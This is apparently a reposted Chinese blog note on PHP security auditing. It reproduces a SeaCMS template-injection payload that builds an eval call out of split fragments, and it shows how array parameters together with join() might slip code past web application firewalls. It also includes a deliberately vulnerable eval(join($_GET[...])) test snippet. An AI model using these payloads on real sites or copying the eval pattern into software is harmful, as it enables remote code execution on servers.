php通过http请求发送数组

释放双眼,带上耳机,听听看~!

最近开始学习php审计,刚好赶上研究seacms,就发现了payload处一个奇怪的点

1 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

9[]=ph&9[]=pinfo();

就尝试了一下,发现在接收数据时,例:

键名=a,那传递a[]=a&a[]=b时,a即为一个数组,便做了个测试,果真如此

服务器端测试代码

<?php
    print_r($_GET[1]);
?>

测试结果如下

php通过http请求发送数组

那么这一个有什么用呢?思考了一下,如果服务器上有安全狗或者waf等防护工具,那么配合其他php函数,例如join函数,可能可以达到绕过效果

提供一个简单思路

服务器测试代码

<?php
    eval(join($_GET[123]));
?>

测试结果如下

php通过http请求发送数组

错误之处,敬请指正

【转自慕课】https://www.imooc.com

PHP

Redis+PHP扩展的安装

2022-3-1 16:44:44

PHP

php经典概率算法

2022-3-1 16:59:48

搜索